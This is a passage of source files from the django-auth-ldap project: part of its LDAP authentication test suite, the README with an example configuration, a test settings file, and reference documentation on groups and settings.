USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n AUTHORIZE_ALL_USERS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"alice\")\n\n self.assertEqual(\n backend.get_group_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n\n def test_authorize_external_unknown(self):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n AUTHORIZE_ALL_USERS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice = User.objects.create(username=\"not-in-ldap\")\n\n self.assertEqual(backend.get_group_permissions(alice), set())\n\n def test_create_without_auth(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n backend = get_backend()\n alice = backend.populate_user(\"alice\")\n bob = backend.populate_user(\"bob\")\n\n self.assertIsNotNone(alice)\n self.assertEqual(alice.first_name, \"\")\n self.assertEqual(alice.last_name, \"\")\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, False)\n self.assertIs(alice.is_superuser, False)\n self.assertIsNotNone(bob)\n self.assertEqual(bob.first_name, \"\")\n self.assertEqual(bob.last_name, \"\")\n self.assertIs(bob.is_active, True)\n self.assertIs(bob.is_staff, False)\n self.assertIs(bob.is_superuser, False)\n\n def test_populate_without_auth(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n ALWAYS_UPDATE_USER=False,\n USER_ATTR_MAP={\"first_name\": \"givenName\", \"last_name\": \"sn\"},\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=GroupOfNamesType(),\n USER_FLAGS_BY_GROUP={\n \"is_active\": \"cn=active_gon,ou=groups,o=test\",\n \"is_staff\": \"cn=staff_gon,ou=groups,o=test\",\n \"is_superuser\": \"cn=superuser_gon,ou=groups,o=test\",\n },\n )\n\n User.objects.create(username=\"alice\")\n User.objects.create(username=\"bob\")\n\n backend = get_backend()\n alice = backend.populate_user(\"alice\")\n bob = backend.populate_user(\"bob\")\n\n self.assertIsNotNone(alice)\n self.assertEqual(alice.first_name, \"Alice\")\n self.assertEqual(alice.last_name, \"Adams\")\n self.assertIs(alice.is_active, True)\n self.assertIs(alice.is_staff, True)\n self.assertIs(alice.is_superuser, True)\n self.assertIsNotNone(bob)\n self.assertEqual(bob.first_name, \"Robert\")\n self.assertEqual(bob.last_name, \"Barker\")\n self.assertIs(bob.is_active, False)\n self.assertIs(bob.is_staff, False)\n self.assertIs(bob.is_superuser, False)\n\n def test_populate_bogus_user(self):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n backend = get_backend()\n bogus = backend.populate_user(\"bogus\")\n\n self.assertIsNone(bogus)\n\n @spy_ldap(\"start_tls_s\")\n def test_start_tls_missing(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", START_TLS=False\n )\n\n authenticate(username=\"alice\", password=\"password\")\n mock.assert_not_called()\n\n @spy_ldap(\"start_tls_s\")\n def test_start_tls(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", START_TLS=True\n )\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n 
authenticate(username=\"alice\", password=\"password\")\n mock.assert_called_once()\n log1, log2, log3 = logs.output\n self.assertEqual(\n log1, \"DEBUG:django_auth_ldap:Binding as uid=alice,ou=people,o=test\"\n )\n self.assertEqual(log2, \"DEBUG:django_auth_ldap:Initiating TLS\")\n self.assertTrue(\n log3.startswith(\n \"WARNING:django_auth_ldap:Caught LDAPError while authenticating alice: \"\n )\n )\n\n def test_null_search_results(self):\n \"\"\"\n Make sure we're not phased by referrals.\n \"\"\"\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n authenticate(username=\"alice\", password=\"password\")\n\n def test_union_search(self):\n self._init_settings(\n USER_SEARCH=LDAPSearchUnion(\n LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"),\n LDAPSearch(\"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"),\n )\n )\n alice = authenticate(username=\"alice\", password=\"password\")\n\n self.assertIsNotNone(alice)\n\n @spy_ldap(\"simple_bind_s\")\n def test_deny_empty_password(self, mock):\n self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n with self.assertLogs(\"django_auth_ldap\", level=logging.DEBUG) as logs:\n alice = authenticate(username=\"alice\", password=\"\")\n\n self.assertIsNone(alice)\n mock.assert_not_called()\n\n self.assertEqual(\n [(log.levelname, log.msg, log.args) for log in logs.records],\n [(\"DEBUG\", \"Rejecting empty password for %s\", (\"alice\",))],\n )\n\n @spy_ldap(\"simple_bind_s\")\n def test_permit_empty_password(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", PERMIT_EMPTY_PASSWORD=True\n )\n\n alice = authenticate(username=\"alice\", password=\"\")\n\n self.assertIsNone(alice)\n mock.assert_called_once()\n\n @spy_ldap(\"simple_bind_s\")\n def test_permit_null_password(self, mock):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\", PERMIT_EMPTY_PASSWORD=True\n )\n\n alice = authenticate(username=\"alice\", password=None)\n\n self.assertIsNone(alice)\n mock.assert_called_once()\n\n def test_pickle(self):\n self._init_settings(\n USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\",\n GROUP_SEARCH=LDAPSearch(\"ou=groups,o=test\", ldap.SCOPE_SUBTREE),\n GROUP_TYPE=MemberDNGroupType(member_attr=\"member\"),\n FIND_GROUP_PERMS=True,\n )\n self._init_groups()\n\n backend = get_backend()\n alice0 = authenticate(username=\"alice\", password=\"password\")\n\n pickled = pickle.dumps(alice0, pickle.HIGHEST_PROTOCOL)\n alice = pickle.loads(pickled)\n\n self.assertIsNotNone(alice)\n self.assertEqual(\n backend.get_group_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertEqual(\n backend.get_all_permissions(alice), {\"auth.add_user\", \"auth.change_user\"}\n )\n self.assertIs(backend.has_perm(alice, \"auth.add_user\"), True)\n self.assertIs(backend.has_module_perms(alice, \"auth\"), True)\n\n @mock.patch(\"ldap.ldapobject.SimpleLDAPObject.search_s\")\n def test_search_attrlist(self, mock_search):\n backend = get_backend()\n connection = backend.ldap.initialize(self.server.ldap_uri, bytes_mode=False)\n search = LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=alice)\", [\"*\", \"+\"]\n )\n search.execute(connection)\n mock_search.assert_called_once_with(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=alice)\", [\"*\", \"+\"]\n )\n\n def test_override_authenticate_access_ldap_user(self):\n 
self._init_settings(USER_DN_TEMPLATE=\"uid=%(user)s,ou=people,o=test\")\n\n class MyBackend(LDAPBackend):\n def authenticate_ldap_user(self, ldap_user, password):\n ldap_user.foo = \"bar\"\n return super().authenticate_ldap_user(ldap_user, password)\n\n backend = MyBackend()\n user = backend.authenticate(None, username=\"alice\", password=\"password\")\n self.assertEqual(user.ldap_user.foo, \"bar\")\n\n @spy_ldap(\"search_s\")\n def test_dn_not_cached(self, mock):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n )\n )\n for _ in range(2):\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertIsNotNone(user)\n # Should have executed once per auth.\n self.assertEqual(mock.call_count, 2)\n # DN is not cached.\n self.assertIsNone(cache.get(\"django_auth_ldap.user_dn.alice\"))\n\n @spy_ldap(\"search_s\")\n def test_dn_cached(self, mock):\n self._init_settings(\n USER_SEARCH=LDAPSearch(\n \"ou=people,o=test\", ldap.SCOPE_SUBTREE, \"(uid=%(user)s)\"\n ),\n CACHE_TIMEOUT=60,\n )\n for _ in range(2):\n user = authenticate(username=\"alice\", password=\"password\")\n self.assertIsNotNone(user)\n # Should have executed only once.\n self.assertEqual(mock.call_count, 1)\n # DN is cached.\n self.assertEqual(\n cache.get(\"django_auth_ldap.user_dn.alice\"), \"uid=alice,ou=people,o=test\"\n )\n\n #\n # Utilities\n #\n\n def _init_settings(self, **kwargs):\n kwargs.setdefault(\"SERVER_URI\", self.server.ldap_uri)\n settings = {}\n for key, value in kwargs.items():\n settings[\"AUTH_LDAP_%s\" % key] = value\n cm = override_settings(**settings)\n cm.enable()\n self.addCleanup(cm.disable)\n\n def _init_groups(self):\n permissions = [\n Permission.objects.get(codename=\"add_user\"),\n Permission.objects.get(codename=\"change_user\"),\n ]\n\n active_gon = Group.objects.create(name=\"active_gon\")\n active_gon.permissions.add(*permissions)\n\n active_px = Group.objects.create(name=\"active_px\")\n active_px.permissions.add(*permissions)\n\n active_nis = Group.objects.create(name=\"active_nis\")\n active_nis.permissions.add(*permissions)\n" }, { "alpha_fraction": 0.6952398419380188, "alphanum_fraction": 0.6965165138244629, "avg_line_length": 33.484275817871094, "blob_id": "ac71310cb980133367e80eecdb168188a9b8c348", "content_id": "d96ad14f848e03f4e9d46a619b445b97e3fd7533", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5483, "license_type": "permissive", "max_line_length": 94, "num_lines": 159, "path": "/README.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "================================\nDjango Authentication Using LDAP\n================================\n\n.. image:: https://readthedocs.org/projects/django-auth-ldap/badge/?version=latest\n :target: https://django-auth-ldap.readthedocs.io/en/latest/\n\n.. image:: https://img.shields.io/pypi/v/django-auth-ldap.svg\n :target: https://pypi.org/project/django-auth-ldap/\n\n.. image:: https://github.com/django-auth-ldap/django-auth-ldap/workflows/Test/badge.svg\n :target: https://github.com/django-auth-ldap/django-auth-ldap/workflows/Test/badge.svg\n\n.. image:: https://img.shields.io/pypi/l/django-auth-ldap.svg\n :target: https://raw.githubusercontent.com/django-auth-ldap/django-auth-ldap/master/LICENSE\n\nThis is a Django authentication backend that authenticates against an LDAP\nservice. 
Configuration can be as simple as a single distinguished name\ntemplate, but there are many rich configuration options for working with users,\ngroups, and permissions.\n\n* Documentation: https://django-auth-ldap.readthedocs.io/\n* PyPI: https://pypi.org/project/django-auth-ldap/\n* Repository: https://github.com/django-auth-ldap/django-auth-ldap\n* License: BSD 2-Clause\n\n.. _`python-ldap`: https://pypi.org/project/python-ldap/\n\n\nInstallation\n============\n\nInstall the package with pip:\n\n.. code-block:: sh\n\n $ pip install django-auth-ldap\n\nIt requires `python-ldap`_ >= 3.1. You'll need the `OpenLDAP`_ libraries and\nheaders available on your system.\n\nTo use the auth backend in a Django project, add\n``'django_auth_ldap.backend.LDAPBackend'`` to ``AUTHENTICATION_BACKENDS``. Do\nnot add anything to ``INSTALLED_APPS``.\n\n.. code-block:: python\n\n AUTHENTICATION_BACKENDS = [\n 'django_auth_ldap.backend.LDAPBackend',\n ]\n\n``LDAPBackend`` should work with custom user models, but it does assume that a\ndatabase is present.\n\n.. note::\n\n ``LDAPBackend`` does not inherit from ``ModelBackend``. It is possible to\n use ``LDAPBackend`` exclusively by configuring it to draw group membership\n from the LDAP server. However, if you would like to assign permissions to\n individual users or add users to groups within Django, you'll need to have\n both backends installed:\n\n .. code-block:: python\n\n AUTHENTICATION_BACKENDS = [\n 'django_auth_ldap.backend.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n ]\n\n.. _`OpenLDAP`: https://www.openldap.org/\n\n\nExample Configuration\n=====================\n\nHere is a complete example configuration from ``settings.py`` that exercises\nnearly all of the features. In this example, we're authenticating against a\nglobal pool of users in the directory, but we have a special area set aside for\nDjango groups (``ou=django,ou=groups,dc=example,dc=com``). Remember that most\nof this is optional if you just need simple authentication. Some default\nsettings and arguments are included for completeness.\n\n.. 
code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch, GroupOfNamesType\n\n\n # Baseline configuration.\n AUTH_LDAP_SERVER_URI = 'ldap://ldap.example.com'\n\n AUTH_LDAP_BIND_DN = 'cn=django-agent,dc=example,dc=com'\n AUTH_LDAP_BIND_PASSWORD = 'phlebotinum'\n AUTH_LDAP_USER_SEARCH = LDAPSearch(\n 'ou=users,dc=example,dc=com',\n ldap.SCOPE_SUBTREE,\n '(uid=%(user)s)',\n )\n # Or:\n # AUTH_LDAP_USER_DN_TEMPLATE = 'uid=%(user)s,ou=users,dc=example,dc=com'\n\n # Set up the basic group parameters.\n AUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n 'ou=django,ou=groups,dc=example,dc=com',\n ldap.SCOPE_SUBTREE,\n '(objectClass=groupOfNames)',\n )\n AUTH_LDAP_GROUP_TYPE = GroupOfNamesType(name_attr='cn')\n\n # Simple group restrictions\n AUTH_LDAP_REQUIRE_GROUP = 'cn=enabled,ou=django,ou=groups,dc=example,dc=com'\n AUTH_LDAP_DENY_GROUP = 'cn=disabled,ou=django,ou=groups,dc=example,dc=com'\n\n # Populate the Django user from the LDAP directory.\n AUTH_LDAP_USER_ATTR_MAP = {\n 'first_name': 'givenName',\n 'last_name': 'sn',\n 'email': 'mail',\n }\n\n AUTH_LDAP_USER_FLAGS_BY_GROUP = {\n 'is_active': 'cn=active,ou=django,ou=groups,dc=example,dc=com',\n 'is_staff': 'cn=staff,ou=django,ou=groups,dc=example,dc=com',\n 'is_superuser': 'cn=superuser,ou=django,ou=groups,dc=example,dc=com',\n }\n\n # This is the default, but I like to be explicit.\n AUTH_LDAP_ALWAYS_UPDATE_USER = True\n\n # Use LDAP group membership to calculate group permissions.\n AUTH_LDAP_FIND_GROUP_PERMS = True\n\n # Cache distinguished names and group memberships for an hour to minimize\n # LDAP traffic.\n AUTH_LDAP_CACHE_TIMEOUT = 3600\n\n # Keep ModelBackend around for per-user permissions and maybe a local\n # superuser.\n AUTHENTICATION_BACKENDS = (\n 'django_auth_ldap.backend.LDAPBackend',\n 'django.contrib.auth.backends.ModelBackend',\n )\n\n\nContributing\n============\n\nIf you'd like to contribute, the best approach is to send a well-formed pull\nrequest, complete with tests and documentation. Pull requests should be\nfocused: trying to do more than one thing in a single request will make it more\ndifficult to process.\n\nIf you have a bug or feature request you can try `logging an issue`_.\n\nThere's no harm in creating an issue and then submitting a pull request to\nresolve it. This can be a good way to start a conversation and can serve as an\nanchor point.\n\n.. 
_`logging an issue`: https://github.com/django-auth-ldap/django-auth-ldap/issues\n" }, { "alpha_fraction": 0.7285223603248596, "alphanum_fraction": 0.7319587469100952, "avg_line_length": 35.375, "blob_id": "6820547ea0429414c07c9e0c418bb079e3c4bc7c", "content_id": "a629b61d2bc5b13f6acf0aac69e3dee79374286d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "permissive", "max_line_length": 80, "num_lines": 8, "path": "/tests/settings.py", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "SECRET_KEY = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890\"\n\nINSTALLED_APPS = (\"django.contrib.auth\", \"django.contrib.contenttypes\", \"tests\")\n\nDATABASES = {\"default\": {\"ENGINE\": \"django.db.backends.sqlite3\"}}\nDEFAULT_AUTO_FIELD = \"django.db.models.BigAutoField\"\n\nAUTHENTICATION_BACKENDS = [\"django_auth_ldap.backend.LDAPBackend\"]\n" }, { "alpha_fraction": 0.7507061958312988, "alphanum_fraction": 0.7507061958312988, "avg_line_length": 43.715789794921875, "blob_id": "d6411121fbcba2bddcc02639ab71f175348fb24c", "content_id": "e47bb3e9b5f9ce859f5b1fa3796e108167e01e1f", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4248, "license_type": "permissive", "max_line_length": 87, "num_lines": 95, "path": "/docs/groups.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Working With Groups\n===================\n\nTypes of Groups\n---------------\n\nWorking with groups in LDAP can be a tricky business, mostly because there are\nso many different kinds. This module includes an extensible API for working with\nany kind of group and includes implementations for the most common ones.\n:class:`~django_auth_ldap.config.LDAPGroupType` is a base class whose concrete\nsubclasses can determine group membership for particular grouping mechanisms.\nFour built-in subclasses cover most grouping mechanisms:\n\n * :class:`~django_auth_ldap.config.PosixGroupType`\n * :class:`~django_auth_ldap.config.MemberDNGroupType`\n * :class:`~django_auth_ldap.config.NestedMemberDNGroupType`\n\nposixGroup and nisNetgroup objects are somewhat specialized, so they get their\nown classes. The other two cover mechanisms whereby a group object stores a list\nof its members as distinguished names. This includes groupOfNames,\ngroupOfUniqueNames, and Active Directory groups, among others. The nested\nvariant allows groups to contain other groups, to as many levels as you like.\nFor convenience and readability, several trivial subclasses of the above are\nprovided:\n\n * :class:`~django_auth_ldap.config.GroupOfNamesType`\n * :class:`~django_auth_ldap.config.NestedGroupOfNamesType`\n * :class:`~django_auth_ldap.config.GroupOfUniqueNamesType`\n * :class:`~django_auth_ldap.config.NestedGroupOfUniqueNamesType`\n * :class:`~django_auth_ldap.config.ActiveDirectoryGroupType`\n * :class:`~django_auth_ldap.config.NestedActiveDirectoryGroupType`\n * :class:`~django_auth_ldap.config.OrganizationalRoleGroupType`\n * :class:`~django_auth_ldap.config.NestedOrganizationalRoleGroupType`\n\n\nFinding Groups\n--------------\n\nTo get started, you'll need to provide some basic information about your LDAP\ngroups. :setting:`AUTH_LDAP_GROUP_SEARCH` is an\n:class:`~django_auth_ldap.config.LDAPSearch` object that identifies the set of\nrelevant group objects. 
That is, all groups that users might belong to as well\nas any others that we might need to know about (in the case of nested groups,\nfor example). :setting:`AUTH_LDAP_GROUP_TYPE` is an instance of the class\ncorresponding to the type of group that will be returned by\n:setting:`AUTH_LDAP_GROUP_SEARCH`. All groups referenced elsewhere in the\nconfiguration must be of this type and part of the search results.\n\n.. code-block:: python\n\n import ldap\n from django_auth_ldap.config import LDAPSearch, GroupOfNamesType\n\n AUTH_LDAP_GROUP_SEARCH = LDAPSearch(\n \"ou=groups,dc=example,dc=com\", ldap.SCOPE_SUBTREE, \"(objectClass=groupOfNames)\"\n )\n AUTH_LDAP_GROUP_TYPE = GroupOfNamesType()\n\n\n.. _limiting-access:\n\nLimiting Access\n---------------\n\nThe simplest use of groups is to limit the users who are allowed to log in. If\n:setting:`AUTH_LDAP_REQUIRE_GROUP` is set, then only users who are members of\nthat group will successfully authenticate. :setting:`AUTH_LDAP_DENY_GROUP` is\nthe reverse: if given, members of this group will be rejected.\n\n.. code-block:: python\n\n AUTH_LDAP_REQUIRE_GROUP = \"cn=enabled,ou=groups,dc=example,dc=com\"\n AUTH_LDAP_DENY_GROUP = \"cn=disabled,ou=groups,dc=example,dc=com\"\n\nHowever, these two settings alone may not be enough to satisfy your needs. In\nsuch cases, you can use the :class:`~django_auth_ldap.config.LDAPGroupQuery`\nobject to perform more complex matches against a user's groups. For example:\n\n.. code-block:: python\n\n from django_auth_ldap.config import LDAPGroupQuery\n\n AUTH_LDAP_REQUIRE_GROUP = (\n LDAPGroupQuery(\"cn=enabled,ou=groups,dc=example,dc=com\")\n | LDAPGroupQuery(\"cn=also_enabled,ou=groups,dc=example,dc=com\")\n ) & ~LDAPGroupQuery(\"cn=disabled,ou=groups,dc=example,dc=com\")\n\nIt is important to note a couple features of the example above. First and foremost,\nthis handles the case of both `AUTH_LDAP_REQUIRE_GROUP` and `AUTH_LDAP_DENY_GROUP`\nin one setting. Second, you can use three operators on these queries: ``&``, ``|``,\nand ``~``: ``and``, ``or``, and ``not``, respectively.\n\nWhen groups are configured, you can always get the list of a user's groups from\n``user.ldap_user.group_dns`` or ``user.ldap_user.group_names``. More advanced\nuses of groups are covered in the next two sections.\n" }, { "alpha_fraction": 0.6998145580291748, "alphanum_fraction": 0.7001854181289673, "avg_line_length": 31.387388229370117, "blob_id": "eeebbf7e1bcd40729757fde90acc1d69dae4d264", "content_id": "a989a152b75fe0c2314a6c1a02c14c0621c3a858", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 21570, "license_type": "permissive", "max_line_length": 98, "num_lines": 666, "path": "/docs/reference.rst", "repo_name": "django-auth-ldap/django-auth-ldap", "src_encoding": "UTF-8", "text": "Reference\n=========\n\nSettings\n--------\n\n.. setting:: AUTH_LDAP_ALWAYS_UPDATE_USER\n\nAUTH_LDAP_ALWAYS_UPDATE_USER\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``True``\n\nIf ``True``, the fields of a :class:`~django.contrib.auth.models.User` object\nwill be updated with the latest values from the LDAP directory every time the\nuser logs in. Otherwise the :class:`~django.contrib.auth.models.User` object\nwill only be populated when it is automatically created.\n\n\n.. 
setting:: AUTH_LDAP_AUTHORIZE_ALL_USERS\n\nAUTH_LDAP_AUTHORIZE_ALL_USERS\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, :class:`~django_auth_ldap.backend.LDAPBackend` will be able to furnish\npermissions for any Django user, regardless of which backend authenticated it.\n\n\n.. setting:: AUTH_LDAP_BIND_AS_AUTHENTICATING_USER\n\nAUTH_LDAP_BIND_AS_AUTHENTICATING_USER\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, authentication will leave the LDAP connection bound as the\nauthenticating user, rather than forcing it to re-bind with the default\ncredentials after authentication succeeds. This may be desirable if you do not\nhave global credentials that are able to access the user's attributes.\ndjango-auth-ldap never stores the user's password, so this only applies to\nrequests where the user is authenticated. Thus, the downside to this setting is\nthat LDAP results may vary based on whether the user was authenticated earlier\nin the Django view, which could be surprising to code not directly concerned\nwith authentication.\nRemember to set :setting:`AUTH_LDAP_USER_DN_TEMPLATE` to avoid an initial\nconnection to LDAP with the default bind credentials.\n\n\n.. setting:: AUTH_LDAP_REFRESH_DN_ON_BIND\n\nAUTH_LDAP_REFRESH_DN_ON_BIND\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, and if :setting:`AUTH_LDAP_BIND_AS_AUTHENTICATING_USER` is ``True`` and\n:setting:`AUTH_LDAP_USER_DN_TEMPLATE` is set, the user's DN is refreshed after a\nsuccessful bind. This is meant for cases in which users authenticate via\n``userPrincipalName`` and the ``distinguishedName`` cannot be inferred from that\nattribute.\n\n\n.. setting:: AUTH_LDAP_BIND_DN\n\nAUTH_LDAP_BIND_DN\n~~~~~~~~~~~~~~~~~\n\nDefault: ``''`` (Empty string)\n\nThe distinguished name to use when binding to the LDAP server (with\n:setting:`AUTH_LDAP_BIND_PASSWORD`). Use the empty string (the default) for an\nanonymous bind. To authenticate a user, we will bind with that user's DN and\npassword, but for all other LDAP operations, we will be bound as the DN in this\nsetting. For example, if :setting:`AUTH_LDAP_USER_DN_TEMPLATE` is not set, we'll\nuse this to search for the user. If :setting:`AUTH_LDAP_FIND_GROUP_PERMS` is\n``True``, we'll also use it to determine group membership.\n\n\n.. setting:: AUTH_LDAP_BIND_PASSWORD\n\nAUTH_LDAP_BIND_PASSWORD\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``''`` (Empty string)\n\nThe password to use with :setting:`AUTH_LDAP_BIND_DN`.\n\n\n.. setting:: AUTH_LDAP_CACHE_TIMEOUT\n\nAUTH_LDAP_CACHE_TIMEOUT\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``0``\n\nThe value determines the amount of time, in seconds, a user's group memberships\nand distinguished name are cached. The value ``0``, the default, disables\ncaching entirely.\n\n.. setting:: AUTH_LDAP_CONNECTION_OPTIONS\n\nAUTH_LDAP_CONNECTION_OPTIONS\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``{}``\n\nA dictionary of options to pass to each connection to the LDAP server via\n:meth:`LDAPObject.set_option() <ldap.LDAPObject.set_option>`. Keys are\n:ref:`ldap.OPT_* <ldap-options>` constants.\n\n\n.. setting:: AUTH_LDAP_DENY_GROUP\n\nAUTH_LDAP_DENY_GROUP\n~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nThe distinguished name of a group; authentication will fail for any user\nthat belongs to this group.\n\n\n.. 
setting:: AUTH_LDAP_FIND_GROUP_PERMS\n\nAUTH_LDAP_FIND_GROUP_PERMS\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``True``, :class:`~django_auth_ldap.backend.LDAPBackend` looks up Django\n:class:`~django.contrib.auth.models.Group`\\ s matching LDAP group names, and\nassigns user permissions based on the Django\n:class:`~django.contrib.auth.models.Group` permissions.\n\n:setting:`AUTH_LDAP_GROUP_SEARCH` and :setting:`AUTH_LDAP_GROUP_TYPE` must also\nbe set.\n\n.. important:: Users will not be added to the Django\n :class:`~django.contrib.auth.models.Group`. The LDAP groups remain the\n source of truth for group membership.\n\n.. setting:: AUTH_LDAP_GLOBAL_OPTIONS\n\nAUTH_LDAP_GLOBAL_OPTIONS\n~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``{}``\n\nA dictionary of options to pass to :func:`ldap.set_option`. Keys are\n:ref:`ldap.OPT_* <ldap-options>` constants.\n\n.. note::\n\n Due to its global nature, this setting ignores the :doc:`settings prefix\n <multiconfig>`. Regardless of how many backends are installed, this setting\n is referenced once by its default name at the time we load the ldap module.\n\n\n.. setting:: AUTH_LDAP_GROUP_SEARCH\n\nAUTH_LDAP_GROUP_SEARCH\n~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nAn :class:`~django_auth_ldap.config.LDAPSearch` object that finds all LDAP\ngroups that users might belong to. If your configuration makes any references to\nLDAP groups, this and :setting:`AUTH_LDAP_GROUP_TYPE` must be set.\n\n\n.. setting:: AUTH_LDAP_GROUP_TYPE\n\nAUTH_LDAP_GROUP_TYPE\n~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nAn :class:`~django_auth_ldap.config.LDAPGroupType` instance describing the type\nof group returned by :setting:`AUTH_LDAP_GROUP_SEARCH`.\n\n\n.. setting:: AUTH_LDAP_MIRROR_GROUPS\n\nAUTH_LDAP_MIRROR_GROUPS\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nIf ``True``, :class:`~django_auth_ldap.backend.LDAPBackend` will mirror a\nuser's LDAP group membership in the Django database. Any time a user\nauthenticates through the :class:`~django_auth_ldap.backend.LDAPBackend`, we\nwill create all of their LDAP groups as Django groups and update their Django\ngroup membership to exactly match their LDAP group membership. If the LDAP\nserver has nested groups, the Django database will end up with a flattened\nrepresentation.\n\nThis can also be a list or other collection of group names, in which case we'll\nonly mirror those groups and leave the rest alone. This is ignored if\n:setting:`AUTH_LDAP_MIRROR_GROUPS_EXCEPT` is set.\n\n.. note:: Users authenticating through another authentication backend, such as\n :class:`~django.contrib.auth.backends.ModelBackend` will **not** have their\n group membership and permissions refreshed from the LDAP server.\n\n\n.. setting:: AUTH_LDAP_MIRROR_GROUPS_EXCEPT\n\nAUTH_LDAP_MIRROR_GROUPS_EXCEPT\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nIf this is not ``None``, it must be a list or other collection of group names.\nThis will enable group mirroring, except that we'll never change the membership\nof the indicated groups. :setting:`AUTH_LDAP_MIRROR_GROUPS` is ignored in this\ncase.\n\n\n.. setting:: AUTH_LDAP_PERMIT_EMPTY_PASSWORD\n\nAUTH_LDAP_PERMIT_EMPTY_PASSWORD\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nIf ``False`` (the default), authentication with an empty password will fail\nimmediately, without any LDAP communication. This is a secure default, as some\nLDAP servers are configured to allow binds to succeed with no password, perhaps\nat a reduced level of access. 
If you need to make use of this LDAP feature, you\ncan change this setting to ``True``.\n\n\n.. setting:: AUTH_LDAP_REQUIRE_GROUP\n\nAUTH_LDAP_REQUIRE_GROUP\n~~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``None``\n\nThe distinguished name of a group; authentication will fail for any user that\ndoes not belong to this group. This can also be an\n:class:`~django_auth_ldap.config.LDAPGroupQuery` instance.\n\n\n.. setting:: AUTH_LDAP_NO_NEW_USERS\n\nAUTH_LDAP_NO_NEW_USERS\n~~~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``False``\n\nPrevent the creation of new users during authentication. Any users not already\nin the Django user database will not be able to log in.\n\n\n.. setting:: AUTH_LDAP_SERVER_URI\n\nAUTH_LDAP_SERVER_URI\n~~~~~~~~~~~~~~~~~~~~\n\nDefault: ``'ldap://localhost'``\n\nThe URI of the LDAP server. This can be any URI that is supported by your\nunderlying LDAP libraries. Can also be a callable that returns the URI. The\ncallable is passed a single positional argument: ``request``.\n\n.. versionchanged:: 1.7.0\n\n    When ``AUTH_LDAP_SERVER_URI`` is set to a 